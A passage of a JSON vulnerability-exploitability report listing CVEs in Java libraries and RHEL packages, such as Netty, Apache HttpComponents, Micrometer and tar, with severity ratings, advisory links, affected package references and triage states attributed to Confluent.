      "description": "Netty is an asynchronous, event-driven network application framework. Prior to 4.1.136.Final and 4.2.16.Final, io.netty.handler.codec.dns.AbstractDnsRecord, io.netty.handler.codec.dns.DefaultDnsRecordDecoder.decodeRecord(), and io.netty.handler.codec.dns.DnsCodecUtil.decompressDomainName() failed to release retained or newly allocated ByteBuf objects when IDN.toASCII() or encodeDomainName() rejected a malformed domain name, allowing unauthenticated remote DNS packets to leak direct memory incrementally until denial of service. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-dns to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-73508"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-73508"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/pull/17063"
        },
        {
          "url": "https://github.com/netty/netty/pull/17065"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-mfg7-5gfp-c4w3"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-73508"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-73508"
        }
      ],
      "published": "2026-08-13T15:20:17+00:00",
      "updated": "2026-08-13T18:18:17+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-dns@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-dns@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#f3aa815a-8b84-4652-a4b5-a6a49e9e0334"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:a6272316-dc84-49f5-9284-bc3d988ac189/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#e4244e17-dde6-4c7c-83b8-9af708bef14e"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#b5d41d65-61e2-4fb6-83cc-a6655e8dd3a8"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#a38d05c6-8535-4e05-b8e4-66f3a0078849"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#f45e3311-8265-47b3-9a37-ac850846c4b4"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#e0f492f8-4522-422c-9161-f6e87ebb3366"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#bf87c984-0f32-412d-9a9d-1e7ad2b436ee"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#fa03e45e-6793-43cf-ac96-8875ddee72ce"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#e4adc6b0-e619-4d29-b183-6f1e1d08b1b5"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#d897f3b8-bc6c-46bd-b2f9-eb54fb40eb3c"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#a1ac53da-4aac-46bf-b39f-c7880eb649de"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#dc5b083e-d426-4935-a1b8-890e6ad49fb3"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#2d8e4813-a4db-4f31-b6a4-2f432228da2a"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:maven/io.netty/netty-codec-dns@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#addfb783-8a57-4114-a038-76e34b6eea61"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-54399",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "Uncontrolled Resource Consumption vulnerability in the HTTP/1.1 message parser\u00a0in Apache HttpComponents Core (5.4.2 and earlier, 5.5-beta1 and earlier) allows\u00a0an remote attacker to cause a denial of service through memory exhaustion by sending messages with excessive number of headers / excessive header length",
      "recommendation": "Upgrade org.apache.httpcomponents.core5:httpcore5 to version 5.4.3, 5.5-beta2",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54399"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/07/01/4"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54399"
        },
        {
          "url": "https://github.com/apache/httpcomponents-core"
        },
        {
          "url": "https://github.com/apache/httpcomponents-core/commit/d96a00fec9b2e19f8005e35681df5f6cd6e21a9e"
        },
        {
          "url": "https://github.com/apache/httpcomponents-core/commit/fdc53a32fe0fccf098cc67e71cd125e447c759ed"
        },
        {
          "url": "https://lists.apache.org/thread/zmxh1pl2zohov5ntdh4lt85gfrlchgpy"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54399"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54399"
        }
      ],
      "published": "2026-07-01T17:16:36+00:00",
      "updated": "2026-07-24T20:04:03+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.0.2",
          "versions": [
            {
              "version": "5.0.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.0.2"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.0.2"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.0.2"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.0.2"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-54428",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400,
        770
      ],
      "description": "Allocation of resources without limits or throttling in the HTTP/2 HPACK decoder in Apache HttpComponents Core (5.4.2 and earlier, 5.5-beta1 and earlier) allows an remote attacker to cause a denial of service through memory exhaustion by sending oversized compressed header blocks before the HTTP/2 SETTINGS acknowledgement causes the configured header list size limit to be applied.",
      "recommendation": "Upgrade org.apache.httpcomponents.core5:httpcore5-h2 to version 5.4.3, 5.5-beta2",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54428"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/07/01/3"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54428"
        },
        {
          "url": "https://github.com/apache/httpcomponents-core"
        },
        {
          "url": "https://github.com/apache/httpcomponents-core/commit/1ea1239bbbe3442a8382a87279c0a8119a7e358e"
        },
        {
          "url": "https://github.com/apache/httpcomponents-core/commit/cc30ee058a7b10cbf4ad3dd6270ab6d1f6a74c49"
        },
        {
          "url": "https://lists.apache.org/thread/5zjp8vczvxq19pw2rvhs21q446bhl0sd"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54428"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54428"
        }
      ],
      "published": "2026-07-01T18:16:34+00:00",
      "updated": "2026-07-24T20:03:41+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.0.2",
          "versions": [
            {
              "version": "5.0.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.0.2"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.0.2"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.0.2"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.0.2"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-64607",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        772
      ],
      "description": "HttpClient based on the classic i/o model fails to correctly release the underlying connection back to the connection manager if it encounters an invalid or unsupported `Content-Encoding` header value in the response message.\u00a0Please note this defect does not affect HttpClient based on the async i/o model.\n\nThis issue affects Apache HttpComponents Client: from 5.0-alpha1 through 5.6.2.",
      "recommendation": "Upgrade org.apache.httpcomponents.client5:httpclient5 to version 5.6.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-64607"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/08/13/5"
        },
        {
          "url": "https://github.com/apache/httpcomponents-client"
        },
        {
          "url": "https://github.com/apache/httpcomponents-client/commit/55733f4121f7ba26ddf04fe12739d9c15962cb94"
        },
        {
          "url": "https://github.com/apache/httpcomponents-client/commit/ebac9512f555c4a355cad3f59ef2db69b597cc97"
        },
        {
          "url": "https://github.com/apache/httpcomponents-client/releases/tag/rel/v5.6.3"
        },
        {
          "url": "https://github.com/apache/httpcomponents-client/releases/tag/rel/v5.7-alpha1"
        },
        {
          "url": "https://lists.apache.org/thread/qqfzo3fqcdk4l5496vz95ppvl4ty511q"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-64607"
        }
      ],
      "published": "2026-07-31T11:17:11+00:00",
      "updated": "2026-08-13T17:17:33+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.0.3",
          "versions": [
            {
              "version": "5.0.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.0.3"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.0.3"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.0.3"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:maven/org.apache.httpcomponents.client5/httpclient5@5.0.3"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-33117",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 9.1,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        287,
        347
      ],
      "description": "The Java Key Vault Keys library in the Azure SDK for Java contains an issue in the local cryptographic verification path where authentication tag comparison was implemented incorrectly. In affected applications that use the vulnerable local cryptography path, specially crafted encrypted input may bypass integrity verification checks. Operations delegated to the Key Vault service are not affected. The issue is addressed in version 4.10.6.",
      "recommendation": "Upgrade com.azure:azure-security-keyvault-keys to version 4.10.6",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-33117"
        },
        {
          "url": "https://github.com/Azure/azure-sdk-for-java"
        },
        {
          "url": "https://github.com/Azure/azure-sdk-for-java/commit/1b5c5c79d85a5c9a9cfd07f6cdff6fd0f50eccf9"
        },
        {
          "url": "https://github.com/Azure/azure-sdk-for-java/pull/48476"
        },
        {
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33117"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33117"
        }
      ],
      "published": "2026-05-12T18:17:04+00:00",
      "updated": "2026-06-17T10:36:58+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2",
          "versions": [
            {
              "version": "4.9.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:a6272316-dc84-49f5-9284-bc3d988ac189/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:maven/com.azure/azure-security-keyvault-keys@4.9.2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "protected_by_mitigating_control",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. the product delegates key operations to the Azure Key Vault service (RSA-OAEP wrap/unwrap for envelope encryption); the vulnerable client-side local crypto path is not exercised, so the security-feature bypass is not reachable."
      }
    },
    {
      "id": "CVE-2026-40984",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400,
        770
      ],
      "description": "In Micrometer, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition.\n\nAffected versions:\nmicrometer-core 1.16.0 through 1.16.5; 1.15.0 through 1.15.11; 1.14.0 through 1.14.15; 1.13.0 through 1.13.18; 1.9.0 through 1.9.17.\nmicrometer-jetty11 1.16.0 through 1.16.5; 1.15.0 through 1.15.11; 1.14.0 through 1.14.15; 1.13.0 through 1.13.18.\nmicrometer-jetty12 1.16.0 through 1.16.5; 1.15.0 through 1.15.11; 1.14.0 through 1.14.15; 1.13.0 through 1.13.18.",
      "recommendation": "Upgrade io.micrometer:micrometer-core to version 1.16.6, 1.15.12",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-40984"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36839"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37390"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:41951"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50848"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50849"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54435"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-40984"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2486716"
        },
        {
          "url": "https://github.com/micrometer-metrics/micrometer"
        },
        {
          "url": "https://github.com/micrometer-metrics/micrometer/commit/36da131525228188a36779a28471a76c79213dd4"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40984"
        },
        {
          "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-40984.json"
        },
        {
          "url": "https://spring.io/security/cve-2026-40984"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-40984"
        }
      ],
      "published": "2026-06-09T05:16:34+00:00",
      "updated": "2026-08-13T13:18:47+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.micrometer/micrometer-core@1.14.4",
          "versions": [
            {
              "version": "1.14.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#pkg:maven/io.micrometer/micrometer-core@1.14.4"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:maven/io.micrometer/micrometer-core@1.14.4"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:maven/io.micrometer/micrometer-core@1.14.4"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:maven/io.micrometer/micrometer-core@1.14.4"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:maven/io.micrometer/micrometer-core@1.14.4"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:maven/io.micrometer/micrometer-core@1.14.4"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:maven/io.micrometer/micrometer-core@1.14.4"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:maven/io.micrometer/micrometer-core@1.14.4"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:maven/io.micrometer/micrometer-core@1.14.4"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:maven/io.micrometer/micrometer-core@1.14.4"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2005-2541",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 10,
          "severity": "high",
          "method": "CVSSv2",
          "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"
        }
      ],
      "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2005-2541"
        },
        {
          "url": "http://marc.info/?l=bugtraq&m=112327628230258&w=2"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2005-2541"
        },
        {
          "url": "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2005-2541"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2005-2541"
        }
      ],
      "published": "2005-08-10T04:00:00+00:00",
      "updated": "2026-04-16T00:27:16+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:1.30-11.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2018-1000654",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.1,
          "severity": "high",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "description": "GNU Libtasn1-4.13 libtasn1-4.13 version libtasn1-4.13, libtasn1-4.12 contains a DoS, specifically CPU usage will reach 100% when running asn1Paser against the POC due to an issue in _asn1_expand_object_id(p_tree), after a long time, the program will be killed. This attack appears to be exploitable via parsing a crafted file.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2018-1000654"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00009.html"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00018.html"
        },
        {
          "url": "http://www.securityfocus.com/bid/105151"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2018-1000654"
        },
        {
          "url": "https://gitlab.com/gnutls/libtasn1/issues/4"
        },
        {
          "url": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000654"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-5352-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2018-1000654"
        }
      ],
      "published": "2018-08-20T19:31:44+00:00",
      "updated": "2026-06-17T01:33:01+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.13-6.el8_10",
              "status": "affected"
            }
          ]
        },
        {
